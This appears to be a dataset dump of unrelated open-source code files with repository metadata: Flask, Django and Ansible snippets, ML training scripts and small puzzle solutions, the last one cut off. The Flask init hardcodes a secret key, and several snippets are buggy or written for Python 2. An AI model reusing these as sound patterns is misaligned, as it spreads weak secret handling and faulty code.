operation = '-'
print('enter your first number')
number_1 = int(input())
print('enter your second number')
number_2 = int(input())
if operation == '+':
print(number_1 + number_2)
else:
print(number_1 - number_2)
|
[
"[email protected]"
] | |
b6f2702ecdab755613afbcabab71516a8bdab2a5
|
ea0118797c975d569f315f240f0c0c621f1649e1
|
/scheduler_code/scheduler/__init__.py
|
8e8b92d40c6bced828c5977e1d5df5b82fd1e520
|
[] |
no_license
|
haitonglin/CS316_F20_Team8
|
29e943f1064e3e8b254a392978e3e2ce1ce4168a
|
a20b14362c3044a50c40fb1e01e3e85c7ecbebee
|
refs/heads/main
| 2023-01-23T06:34:47.908752 | 2020-11-17T18:50:45 | 2020-11-17T18:50:45 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 465 |
py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
app = Flask(__name__)
app.config['SECRET_KEY'] = '5791628bb0b13ce0c676dfde280ba245'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'
db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
login_manager = LoginManager(app)
login_manager.login_view = 'login'
login_manager.login_message_category = 'info'
from scheduler import routes
|
[
"[email protected]"
] | |
c774a33d908e3d62f2abbecc5399589352c6b667
|
644cd6849385c1e142acb01a538843a42c7a82ce
|
/experiments/sample_feature.py
|
3f492c466b505a276939802a8eef2ea6d4195032
|
[] |
no_license
|
dcrankshaw/clipper-plots
|
0a4f2833ad22fe13e4f341bb1d7d90d883c52e75
|
1398f99c64f1aab238a46c00f307f26dce1bde97
|
refs/heads/master
| 2021-01-22T13:57:25.894553 | 2017-02-24T07:23:12 | 2017-02-24T07:23:24 | 46,454,875 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,390 |
py
|
import pandas as pd
import numpy as np
import sklearn.linear_model as lm
import sklearn.svm as svm
from sklearn.externals import joblib
import os
import sys
def load_digits(digits_location, digits_filename = "train.data"):
digits_path = digits_location + "/" + digits_filename
print "Source file:", digits_path
df = pd.read_csv(digits_path, sep=",", header=None)
data = df.values
print "Number of image files:", len(data)
y = data[:,0]
X = data[:,1:]
return (X, y)
# Predicts if digit is 1
class TestFeature:
def __init__(self, digits_loc, label):
self.label = label + 1
X, y = load_digits(digits_loc)
self.mu = np.mean(X,0)
self.sigma = np.var(X,0)
Z = self.normalize_digits(X)
my_y = [1. if i == self.label else 0. for i in y]
print np.count_nonzero(my_y)
model = svm.SVC()
model.fit(Z, my_y)
self.model = model
def normalize_digits(self, X):
Z = (X - self.mu) / np.array([np.sqrt(z) if z > 0 else 1. for z in self.sigma])
return Z
def predict(self, x):
z = self.normalize_digits(x)
return self.model.predict(z)
def hash_input(self, x):
return hash(x.data.tobytes())
if __name__=='__main__':
digits_loc = "/crankshaw-local/mnist/data"
start = int(sys.argv[1])
end = int(sys.argv[2])
for label in range(start,end + 1):
f_name = "predict_%d_svm" % label
try:
os.mkdir('sklearn_models/%s' % f_name)
except OSError:
print("directory already exists. Might overwrite existing file")
print "training label %d" % label
f = TestFeature(digits_loc, label)
joblib.dump(f, 'sklearn_models/%s/%s.pkl' % (f_name, f_name))
# f = joblib.load('test_model/predict_1_svm.pkl')
# print "model trained"
# test_x, test_y = load_digits(digits_loc, digits_filename="test-mnist-dense-with-labels.data")
# pred_wrong = 0.
# pred_total = 200
# for i in range(pred_total):
# idx = np.random.randint(len(test_y))
# y_p = f.predict(test_x[idx])[0]
# y_t = test_y[idx] - 1
# if y_t == f.label:
# y_t = 1.0
# else:
# y_t = 0.0
# if y_t != y_p:
# pred_wrong += 1.
# print float(pred_wrong)/float(pred_total)
|
[
"[email protected]"
] | |
c42a9905f1b7ec50d3d141f11e5ae4b21046be4a
|
9ae5863f44403255a3068d4e09df8e9a76cf6fb9
|
/Lv1/DuplicateNumbers.py
|
4b6de77b848cb534002934558f00e3a8e7aad5e8
|
[] |
no_license
|
ybear90/coding_dojang_solution-practice-
|
42f564ac9c48311538bdbf02932498efbd0e7dab
|
644cbe02bd52d84fdbb84faf3938aa26855ed24c
|
refs/heads/master
| 2020-04-20T12:08:08.702191 | 2019-05-31T17:39:00 | 2019-05-31T17:39:00 | 168,835,727 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,159 |
py
|
"""
Duplicate Numbers
일전에 뭐 게임 회사에서 본 간단한 퀴즈 테스트 입니다.
0~9까지의 문자로 된 숫자를 입력 받았을 때, 이 입력 값이 0~9까지의 숫자가 각각 한 번 씩만 사용된 것인지 확인하는 함수를 구하시오.
sample inputs: 0123456789 01234 01234567890 6789012345 012322456789
sample outputs: true false false true false
"""
r_input = input().split()
def inputInit(cList):
for i in range(10):
cList[i] = 0
def DuplicateNumbers(lList):
# Initialize check input list
check_value = list()
for i in range(len(lList)):
check_value.append(True)
check_input = list()
for i in range(10):
check_input.append(0)
# Checking duplicate number
for i in range(len(lList)):
for j in range(len(lList[i])):
check_input[int(lList[i][j])] += 1
# Finally check duplicate number(T or F)
for k in range(len(check_input)):
print(check_input[k])
if check_input[k] != 1:
check_value[i] = False
inputInit(check_input)
print(check_value)
DuplicateNumbers(r_input)
|
[
"[email protected]"
] | |
3ef7e25a59a3ca2672554115318f33e31822fd25
|
e5dc27e634aba70bcd1b3acea74fed84ddccf837
|
/plugins/modules/template_project.py
|
432a757ecb62ba97acf49d326d6c97cb68fe269b
|
[] |
no_license
|
jejrichardson/dnacenter-ansible
|
264d1b52227d4bf78ad175494763cff9e7881f34
|
f10078ef8323bda4b542e71bcecf4f80a7fe0609
|
refs/heads/master
| 2023-01-28T09:54:57.449459 | 2020-12-09T23:15:49 | 2020-12-09T23:15:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,792 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2020, Rafael Campos <[email protected]>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {
"metadata_version": "0.0.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: template_project
short_description: Manage TemplateProject objects of ConfigurationTemplates
description:
- Returns the projects in the system.
- Creates a new project.
- Updates an existing project.
- Deletes an existing Project.
version_added: '1.0'
author: Rafael Campos (@racampos)
options:
name:
description:
- Name of project to be searched.
- ProjectDTO's name.
type: str
createTime:
description:
- ProjectDTO's createTime.
type: int
description:
description:
- ProjectDTO's description.
type: str
id:
description:
- ProjectDTO's id.
type: str
lastUpdateTime:
description:
- ProjectDTO's lastUpdateTime.
type: int
tags:
description:
- ProjectDTO's tags (list of strings).
type: list
templates:
description:
- ProjectDTO's templates.
type: dict
project_id:
description:
- ProjectId path parameter.
- Required for state delete.
type: str
requirements:
- dnacentersdk
seealso:
# Reference by module name
- module: cisco.dnac.plugins.module_utils.definitions.template_project
# Reference by Internet resource
- name: TemplateProject reference
description: Complete reference of the TemplateProject object model.
link: https://developer.cisco.com/docs/dna-center/api/1-3-3-x
# Reference by Internet resource
- name: TemplateProject reference
description: SDK reference.
link: https://dnacentersdk.readthedocs.io/en/latest/api/api.html#v2-1-1-summary
"""
EXAMPLES = r"""
- name: get_projects
cisco.dnac.template_project:
state: query # required
name: SomeValue # string
register: query_result
- name: create_project
cisco.dnac.template_project:
state: create # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: update_project
cisco.dnac.template_project:
state: update # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: delete_project
cisco.dnac.template_project:
state: delete # required
project_id: SomeValue # string, required
"""
RETURN = """
get_projects:
description: Returns the projects in the system.
returned: always
type: dict
contains:
payload:
description: It is the template project's payload.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
templates:
description: It is the template project's templates.
returned: always
type: list
contains:
name:
description: It is the template project's name.
returned: always
type: str
sample: '<name>'
composite:
description: It is the template project's composite.
returned: always
type: bool
sample: false
id:
description: It is the template project's id.
returned: always
type: str
sample: '478012'
create_project:
description: Creates a new project.
returned: success
type: dict
contains:
response:
description: ProjectDTO's response.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: success
type: str
sample: '1.0'
update_project:
description: Updates an existing project.
returned: changed
type: dict
contains:
response:
description: ProjectDTO's response.
returned: changed
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: changed
type: dict
url:
description: It is the template project's url.
returned: changed
type: str
sample: '<url>'
version:
description: ProjectDTO's version.
returned: changed
type: str
sample: '1.0'
delete_project:
description: Deletes an existing Project.
returned: success
type: dict
contains:
response:
description: Response, property of the response body.
returned: success
type: dict
contains:
taskId:
description: It is the template project's taskId.
returned: success
type: dict
url:
description: It is the template project's url.
returned: success
type: str
sample: '<url>'
version:
description: Version, property of the response body.
returned: success
type: str
sample: '1.0'
"""
|
[
"[email protected]"
] | |
c0056aa85383d670add5f74e627672b310c662ce
|
a867b1c9da10a93136550c767c45e0d8c98f5675
|
/G_LC_1055_ShortestWaytoFormString.py
|
057fd0b488c0696e709603ccc3d5993c1b5d2c98
|
[] |
no_license
|
Omkar02/FAANG
|
f747aacc938bf747129b8ff35b6648fb265d95b6
|
ee9b245aa83ea58aa67954ab96442561dbe68d06
|
refs/heads/master
| 2023-03-25T19:45:08.153403 | 2021-03-28T07:13:08 | 2021-03-28T07:13:08 | 280,783,785 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 835 |
py
|
# import __main__ as main
# from Helper.TimerLogger import CodeTimeLogging
# fileName = main.__file__
# fileName = fileName.split('\\')[-1]
# CodeTimeLogging(Flag='F', filename=fileName, Tag='String', Difficult='Medium')
def shotestWaytoFormString(scr, target):
numMinString = 0
remaning = target
while len(remaning) != 0:
subsequence = ""
i = j = 0
while i < len(scr) and j < len(remaning):
if scr[i] == remaning[j]:
subsequence += remaning[j]
j += 1
i += 1
if len(subsequence) == 0:
return -1
numMinString += 1
remaning = remaning[len(subsequence):]
return numMinString
scr = "abc"
target = "abcbc"
scr = "abc"
target = "abcdbc"
a = [1, 2, 3, 4, 5]
print(shotestWaytoFormString(scr, target))
|
[
"[email protected]"
] | |
5cd51dcc05b75b2b754648bb03a96025a4d74590
|
d261119814862d1119ffa0a7bf64f2cfa956afac
|
/python_stack/django/django_full_stack/the_wall/apps/login_app/views.py
|
cc43e6d3148d0ae0f7cb82862d9a199126e16b7b
|
[] |
no_license
|
edwinreg011/Coding-Dojo
|
3280a2290dc4d8fb709c1ff4b4906b078925a705
|
14bb5844d741a2be05f995987a434f335c90e6c9
|
refs/heads/master
| 2022-12-24T14:23:20.342451 | 2019-12-17T19:24:54 | 2019-12-17T19:24:54 | 228,685,995 | 0 | 0 | null | 2022-12-11T17:34:49 | 2019-12-17T19:21:41 |
Python
|
UTF-8
|
Python
| false | false | 2,716 |
py
|
from django.shortcuts import render, HttpResponse, redirect
from .models import *
from django.contrib import messages
import bcrypt
def index(request):
return render(request, 'login_app/index.html')
def register(request):
if request.method == 'POST':
errors = User.objects.user_validator(request.POST)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value)
return redirect('/')
else:
hashed_password = bcrypt.hashpw(
request.POST['password'].encode(), bcrypt.gensalt())
new_user = User.objects.create(
first_name=request.POST['first_name'], last_name=request.POST['last_name'], email=request.POST['email'], password=hashed_password)
request.session['user_id'] = new_user.id
return redirect('/users/success')
return redirect('/')
def login(request):
if request.method == 'POST':
try:
user = User.objects.get(email=request.POST['email'])
except:
messages.error(request, 'Invalid username or password')
return redirect('/')
if bcrypt.checkpw(request.POST['password'].encode(), user.password.encode()):
request.session['first_name'] = user.first_name
request.session['user_id'] = user.id
return redirect('/users/success')
else:
messages.error(request, 'Invalid username or password')
return redirect('/')
return redirect('/')
def success(request):
if not check_login(request):
return redirect('/')
context = {
'user': User.objects.get(id=request.session['user_id']),
'post_data': Message.objects.all(),
'comment_data': Comment.objects.all(),
}
return render(request, 'login_app/success.html', context)
def logout(request):
del request.session['user_id']
del request.session['first_name']
return redirect('/')
def check_login(request):
if not 'first_name' in request.session:
messages.error(request, 'Log in to view this page')
return False
return True
# THE_WALL
def add_message(request):
Message.objects.create(message=request.POST['add_message'], user=User.objects.get(id=request.session['user_id']))
return redirect('/users/success')
def add_comment(request):
Comment.objects.create(comment = request.POST['add_comment'], user=User.objects.get(id=request.session['user_id']), message=Message.objects.get(id=request.POST['message_ID']))
return redirect('/users/success')
def delete(request, id):
m = Message.objects.get(id=id)
m.delete()
return redirect('/users/success')
|
[
"[email protected]"
] | |
88bd31ecc6bd237466ec96a185b1d943f4ead144
|
2d060eb9c7126b8963adcad857daa6e39c6ac75f
|
/Resist.py
|
12e4f998383248c49443c1a4b9fc74c578754390
|
[] |
no_license
|
easy-rpg/Filler
|
43ce36980156f4ffd9597d822e9fa6c19105d892
|
55cddbbb21ac508f64b98ceedbc30c680d4c4951
|
refs/heads/master
| 2020-03-15T01:38:51.069870 | 2016-09-03T07:12:55 | 2016-09-03T07:12:55 | 131,898,370 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 560 |
py
|
import abc
class Resist_Boa(object):
"""docstring for """
__metaclass__ = abc.ABCMeta
valores = [2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12]
@abc.abstractmethod
def __str__(self):
raise NotImplementedError('users must define __str__ to use this base class')
class Resist_Ruim(object):
"""docstring for """
__metaclass__ = abc.ABCMeta
valores = [0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 6]
@abc.abstractmethod
def __str__(self):
raise NotImplementedError('users must define __str__ to use this base class')
|
[
"[email protected]"
] | |
8be0fa5c204f717833ba8ac10685a4af74ae08c8
|
37aeb840e5d13ff298e8a34e019e29cf30141bc6
|
/tests/test_model.py
|
dd0cfba9072f6fce82c694a9588dee50069f3acb
|
[
"MIT"
] |
permissive
|
mathildebadoual/mosaik-batterysim
|
d39cd401226e12bb6991fe07aa428ca251d77faa
|
5e37b419c3f8fd57cacc6975a5660c308cad31bd
|
refs/heads/master
| 2023-01-05T00:45:27.921255 | 2018-11-29T18:02:18 | 2018-11-29T18:02:18 | 136,089,746 | 1 | 2 |
MIT
| 2022-12-26T20:28:36 | 2018-06-04T22:28:38 |
Python
|
UTF-8
|
Python
| false | false | 1,016 |
py
|
from os.path import dirname, join
import arrow
import unittest
from batterysim.model import BatteryModel
data_file = join(dirname(__file__), 'data', 'test.data')
class TestHouseModel(unittest.TestCase):
def setUp(self):
self.bm = BatteryModel(open(data_file), 'grid_test')
def test_batterymodel_init(self):
self.assertEqual(self.bm.start, arrow.get('2014-01-01'))
self.assertEqual(self.bm.unit, 'W')
self.assertEqual(self.bm.num_batteries, 3)
# soc_init
self.assertEqual(self.bm.batteries[2]['object'].charge, 0.5)
def test_batterymodel_get(self):
self.assertEqual(self.bm.get(10)[2], 0.5)
def test_batterymodel_get_delta(self):
date = '2014-01-03 01:00:00'
delta = 2940
minutes = self.bm.get_delta(date)
self.assertEqual(minutes, delta)
def test_batterymodel_get_delta_error(self):
self.assertRaises(ValueError,
lambda: self.bm.get_delta('2013-01-01 01:00:00'))
|
[
"[email protected]"
] | |
c502ce9cabce0dd8cc569f1883c2d6eb4df881fa
|
196054b50691861ef98cbcc66b5209235f488f5b
|
/fileupload/forms.py
|
e048ff31dc5895fc918a86f968d753a70910e4f3
|
[] |
no_license
|
rydauphin/DataDirector
|
9b41093b6da39472cc7f8bdeffdea017a87ac66e
|
612eab26f8f205e76e4086ab55ad5d7c89053ee0
|
refs/heads/master
| 2020-04-13T17:08:30.949088 | 2019-01-03T21:46:05 | 2019-01-03T21:46:05 | 163,339,913 | 1 | 1 | null | 2019-01-03T21:07:40 | 2018-12-27T22:06:48 |
Python
|
UTF-8
|
Python
| false | false | 166 |
py
|
from django import forms
from .models import FileUpload
class FileUploadForm(forms.ModelForm):
class Meta:
model = FileUpload
fields = ('file',)
|
[
"[email protected]"
] | |
db605eaa64ddbafc35c69a599ae236c6fe638bdb
|
51999a7eaa33b82cac2a2c7212e546cc0420f8d7
|
/old_code/get_opcode_by_class.py
|
30841932679b2d11d2abd1316f808a4f8cfbc2f8
|
[] |
no_license
|
guptanitish/MicrosoftMalwareClassifcation
|
56efcf8bcacb3516966ac4bf0d731bb21c26128a
|
da1f5c22874d9f58df0ee61b0210ff5c9566e03d
|
refs/heads/master
| 2020-04-13T16:47:05.034358 | 2015-09-14T21:42:42 | 2015-09-14T21:42:42 | 32,280,391 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,322 |
py
|
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
#dictionary of opcodes per file
import pickle
import re
import os, os.path
import pandas as pd
import pickle
import sys
from sklearn.cross_validation import train_test_split
import io
'''
#returns a list
#searches for ' opcode ' from a specified list of opcodes
#needs:
output_path='/home/rishoo/Downloads/data/pickle/dict.txt' #where to store the output
label_csv_path='/home/rishoo/Downloads/data/trainLabels.csv' #path to csv file mapping filenames to labels
data_path = '/home/rishoo/Downloads/data/train_tiny_subset/' #path to the data
raw_opcode_list=['mov','add','sub'] #list of opcodes to filter
'''
output_path='/home/stufs1/nitigupta/512/results/dict_10percent.txt' #where to store the output
label_csv_path='/home/stufs1/nitigupta/512/data/trainLabels.csv' #path to csv file mapping filenames to labels
data_path = '/home/stufs1/nitigupta/512/data/train/' #path to the data
raw_opcode_list=['mov','add','sub','imul'] #list of opcodes to filter
# <codecell>
df_entire= pd.read_csv(label_csv_path)
a_train, a_test= train_test_split(df_entire,test_size=0.001, random_state=42)
df_test=pd.DataFrame.from_records(a_test)
# <codecell>
#build label dict - filename->labels
print("extracting labels..")
def get_labels(path,label_d,df):
#df= pd.read_csv(path)
for index, row in df.iterrows():
label_d[row[0]]=row[1]
label_d=dict()
get_labels(label_csv_path,label_d,df_test)
print("done extracting labels..")
# <codecell>
#making list of dict to store counts
opcode_dict_l=list()
for i in range(0,9):
opcode_dict=dict()
for item in raw_opcode_list:
formatted_opcode=' '+item+' '
opcode_dict[formatted_opcode]=0
opcode_dict_l.append(opcode_dict)
def count_opcodes(directory_path,filename):
#byte_limit=100
try:
path=directory_path+filename
openfile = io.open(path,'r',encoding='latin-1')
#openfile = open(path,'rb')
l_lines=openfile.readlines()
count=0
for line in l_lines:
#match_text=re.search("text:",line)
#if match_text:
for opcode in opcode_dict.keys():
#match_opcode=None
match_opcode=re.search(opcode,line)
if match_opcode:
#print (match.group())
filename_key= filename[:-4]
opcode_dict_l[label_d[filename_key]-1][opcode]+=1
break
openfile.close()
except IOError:
print ("Could not open file!")
count=0
print("Begin...")
for filename in os.listdir(data_path):
if((filename[-4:])=='.asm'): #.swp files!
filename_key= filename[:-4]
if((label_d.get(filename_key,-1))!=-1):
label=label_d[filename_key]
print("Processing...\t",count,"\tlabel: ",label,"\t",filename,"\t")
sys.stdout.flush()
count_opcodes(data_path,filename)
count+=1
print("Done!")
# <codecell>
print("Pickling...")
dumpfile=open(output_path,'wb')
pickle.dump(opcode_dict_l,dumpfile)
dumpfile.close()
unpickled_file=open(output_path,'rb')
print("Done Pickling...")
unpickled_dict=pickle.load(unpickled_file)
unpickled_dict
# <codecell>
# <codecell>
|
[
"[email protected]"
] | |
e99a2ed03cfedf90fc2bdb91759de41cf60af1bc
|
db5308ba0417093282a353d8cd60089ca7cd974e
|
/Top-Interview-Questions/DynamicProgramming-Easy-Collection/121-best-time-to-buy-and-sell-stock.py
|
6e5ef13c4fc64e14467cd4e890a80759e9b4a65a
|
[] |
no_license
|
ssong86/leetcode-problem-solving
|
11a03abb20b6a9f62a29decd2a81b404710eed14
|
5ff31f31b8472373b54c9fd0e02e2be5e69a3dd3
|
refs/heads/master
| 2022-11-28T20:17:53.239044 | 2020-07-29T06:09:21 | 2020-07-29T06:09:21 | 259,515,217 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 481 |
py
|
class Solution:
def maxProfit(self, prices: List[int]) -> int:
buy, sell = float('inf'), 0
for p in prices:
buy, sell = min(buy, p), max(sell, p-buy)
# if p < buy:
# minprice = p
# elif p-minprice > sell:
# sell = p - minprice
return sell
# TC: O(n), n is the length of prices list
# SC: O(1)
# Runtime: 68 ms, faster than 51.98%
# Memory Usage: 15.1 MB, less than 74.89%
|
[
"[email protected]"
] | |
86d484c5ac99a387727ae07639d43a727abe014d
|
392f82f3af6ac5f886dfae0adfc9df27816027f8
|
/IData/IDataSearch/backdoor/analysis/SSRP_cooperation_analysis.py
|
3752690c60b8318e4a72b3cd914e11f2bdfcd711
|
[] |
no_license
|
Hitchcock717/SSRP-Dev
|
6914033b1af4a67c6f8fe44108ad522eadfaa82d
|
d6316fc3e99387c053415fd5e5421b122c41bb05
|
refs/heads/master
| 2023-02-06T12:22:11.826570 | 2020-06-10T01:24:27 | 2020-06-10T01:24:27 | 248,780,528 | 1 | 0 | null | 2023-01-26T15:03:47 | 2020-03-20T14:50:35 |
Python
|
UTF-8
|
Python
| false | false | 5,070 |
py
|
# -*- coding: utf-8 -*-
'''
SSRP分析平台之关系图分析 --- 作者两两合作
tips: 数据过载问题
'''
import itertools
from .SSRP_convert2num import *
class CooperateAnalysis(object):
def __init__(self):
# self.two_aus = ['王曜 陈舜胜', '郝勇 陈斌', '王洪荣 季昀', '周贤婧 师彦平', '王明智 杜建忠', '侯殿志 沈群', '张玉洁 付丽红', '凃璨 熊飞', '晓影 晓蓉', '李宗吉 赵巍', '邱澄宇 林杰曦', '申培博 韩秀珍', '李清 冶贵生', '何元丽 李国英', '李婷 翁武银', '石晶 陈荣冰', '石晶 陈荣冰', '臧学丽 陈光', '刘芊麟 陈亚楠', '刘芊麟 陈亚楠', '潘征 潘兴寿', '荣立洋 李毓秋', '潘振伟 侯宪云', '秦超燕 宁带连', '涂宽 崔鸿', '马娟 唐仕芳', '麦麦提艾力·阿卜杜纳斯尔 马纪', '廖晓峰 于荣', '郑贤金 汤斌', '杨旭 谢盈', '田顺立 郑春阳', '王洪 赵亚军', '周礼元 姜孝珣', '张丽琼 李博', '张金龙 蒋高喜', '徐澜 黄孟', '罗志祥 罗志忠', '佘宁 何伟先', '李伟龙 周晓肖', '肖永仁 杨连玉', '赵振东 王洁', '张树泽 吴国豪', '杨建芬 刘瑶', '小兵 植观', '祝远超 熊勇刚', '鲁佩玉 孙青华', '周芳 索化夷', '王姣 李宗孝', '闵建华 王浩', '闫文华 欧杰', '王清 陈舜胜', '马本贺 王海华', '张志浩 张继平', '成依依 周红宁', '王妍 令狐恩强', '黄嘉禾 贺平安', '王美迟 王贤纯', '苏艳玲 张谨华', '谢剑飞 杨欣卉', '黄啟亮 宋晓东', '田畅 王洋', '钱红 刘克明', '赵文鹏 黄国欣']
# self.more_aus = ['周冰心 傅勇 刘群 刘晶', '郝长波 张洁 谢建伟 王磊磊', '韩加敏 董霞 王小平 周昱恒', '麦麦提艾力·阿卜杜纳斯尔 李梦鸽 包静 随慧', '王晓岩 图力古尔 包海鹰', '陈丽花 朱楚楚 李冉冉', '何晓红 杨宏国 伍晓丽 刘飞 谢永芳 蒋龙星 王宇 冉玲芳', '程楠 项黛徽 沈雅园 付建新 张超', '施魁 唐燕妮 刘炀 管武太 陈芳 邓跃林', '王英明 徐亚欧 王志敏 徐珑洋 杨磊 林亚秋', '刘翠 潘健存 李媛媛 陈勇 蒋士龙', '王芳 乔璐 张庆庆 沈斌', '李景芳 王燕 陆东林', '农玉琴 李金婷 陈远权 陆金梅 廖春文 韦持章 韦锦坚', '王澍 冯力 李倩 杜鹃', '尹敬 任晓镤 钱烨 王震 彭增起 张雅玮', '刘中成 刘世芳 张苏 杨艳蕾 李飞 张楠 袁欣 张艳芬', '张勇 李弘文 曹晋良 南晓洁 杨丽', '金春爱 崔松焕 赵卉 嵩之松 王艳梅 刘畅 孙印石', '陈怡颖 丁奇 赵静 孙颖 张玉玉 孙宝国 郑福平', '郭丹 王晶 齐广海 张涛 高俊 张海军 武书庚', '周玉照 张小苗 赵天智 普星星 张以芳', '赵诗瑜 张帆 周晓龙 汪涵 赵阿勇 杨松柏']
self.search = SearchDictBuild()
def build_two_authors(self, two_aus):
two_aus_data = []
two_aus_list = [aus.split(' ') for aus in two_aus]
for au in two_aus_list:
aus_combi = list(itertools.combinations(au, 2))
two_aus_data.extend(aus_combi)
return two_aus_data
def build_more_authors(self, more_aus):
more_aus_data = []
more_aus_list = [aus.split(' ') for aus in more_aus]
for au in more_aus_list:
aus_combi = list(itertools.combinations(au, 2))
more_aus_data.extend(aus_combi)
return more_aus_data
def prepare_data(self, two_aus, more_aus):
data = []
two_aus = self.build_two_authors(two_aus)
more_aus = self.build_more_authors(more_aus)
data.extend(two_aus)
data.extend(more_aus)
# 清洗,删去无用关系
for aus in data:
aus_check = aus[1]
if aus_check == '':
data.remove(aus)
# print(data)
return data
def build_au_id(self, two_aus, more_aus):
data = self.prepare_data(two_aus, more_aus)
s_li = self.search.aus_build(data)
aus_li = self.search.de_duplication(s_li)
ids_li = self.search.ids_build(aus_li)
au_id_dict = self.search.dict_build(aus_li, ids_li)
return au_id_dict
def build_au_relation(self, two_aus, more_aus):
relations = []
for k in self.prepare_data(two_aus, more_aus):
relation = {}
p_au1, q_au2 = k[0], k[1]
p = self.build_au_id(two_aus, more_aus).get(p_au1)
q = self.build_au_id(two_aus, more_aus).get(q_au2)
relation['from'] = str(p)
relation['to'] = str(q)
relations.append(relation)
print(relations)
ids = []
for k,v in zip(list(self.build_au_id(two_aus, more_aus).keys()), list(self.build_au_id(two_aus, more_aus).values())):
id = {}
id['id'] = int(v)
id['label'] = str(k)
ids.append(id)
print(ids)
return ids, relations
if __name__ == '__main__':
cooper = CooperateAnalysis()
cooper.build_au_relation(two_aus, more_aus)
|
[
"[email protected]"
] | |
179cd7a1f65d62c1be568abe96d98561a937e2e9
|
d7f4ae811a22bb71eeef6132c3f2964336803d0d
|
/users/migrations/0002_auto_20190302_1232.py
|
7ef75bfb16a98159bedc5b30fcbf2dbb66820a26
|
[] |
no_license
|
antoncoding/grusse
|
305a2ee87cc246e0e65b78ad89797015675c124e
|
332daa7f3541d1bede5668fa7f83f081bc1b8eca
|
refs/heads/master
| 2021-03-13T04:11:09.578151 | 2020-08-04T05:06:48 | 2020-08-04T05:06:48 | 72,293,341 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,527 |
py
|
# Generated by Django 2.1.7 on 2019-03-02 12:32
from django.db import migrations, models
import django_countries.fields
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='customuser',
name='birthday',
field=models.DateTimeField(blank=True, default='2000-01-01', null=True),
),
migrations.AddField(
model_name='customuser',
name='city',
field=models.CharField(blank=True, default='', max_length=100),
),
migrations.AddField(
model_name='customuser',
name='count_friend',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='customuser',
name='count_mail',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='customuser',
name='country',
field=django_countries.fields.CountryField(default='Taiwan', max_length=2),
),
migrations.AddField(
model_name='customuser',
name='gender',
field=models.CharField(choices=[('M', 'Male'), ('F', 'Female')], default='M', max_length=1),
),
migrations.AddField(
model_name='customuser',
name='photo',
field=models.ImageField(blank=True, null=True, upload_to='profilepic'),
),
]
|
[
"[email protected]"
] | |
e69f811f53141bb78526caedfde84012278ff07b
|
7bdb6ac5e4c9fc83b474e982df4f3a03a5281934
|
/tests/container_test.py
|
d30cad8ee3a5fc540b9ac200b994821d047a00fb
|
[] |
no_license
|
kochhar/pyrabj
|
47ddafbd15df5e717f4ae02815eef35a07ead8a8
|
f40c519eea92d7af093502e4397a8dcf23ec73ba
|
refs/heads/master
| 2016-09-06T12:54:03.564785 | 2012-02-15T23:10:02 | 2012-02-15T23:10:02 | 347,299 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 145 |
py
|
#!/usr/bin/env python
import rabj.simple as s
srv = s.RabjServer('http://rabj.freebase.com')
pqs = srv.public_queues()
print type(pqs[0].queue)
|
[
"[email protected]"
] | |
426b5255178ef4260436d7edc63a70a6bc93c9d6
|
b082fa207b5ac9db2f3529c46897312f886c18fb
|
/doc/edl/experiment/mnist/train_ft.py
|
09fe077654ac53bf32ae84434eb85d65c67dc3ca
|
[
"Apache-2.0"
] |
permissive
|
qizheng09/cloud
|
e129c42a6401d64e2d3e4d0cf65b4a6a5410069f
|
2a6aa526f2eec0d3e3aedca78d15bdc72b85bef9
|
refs/heads/develop
| 2021-05-14T10:08:58.885713 | 2018-03-02T06:26:31 | 2018-03-02T06:26:31 | 116,345,049 | 0 | 0 |
Apache-2.0
| 2018-02-13T11:42:51 | 2018-01-05T05:16:26 |
JavaScript
|
UTF-8
|
Python
| false | false | 4,593 |
py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from PIL import Image
import numpy as np
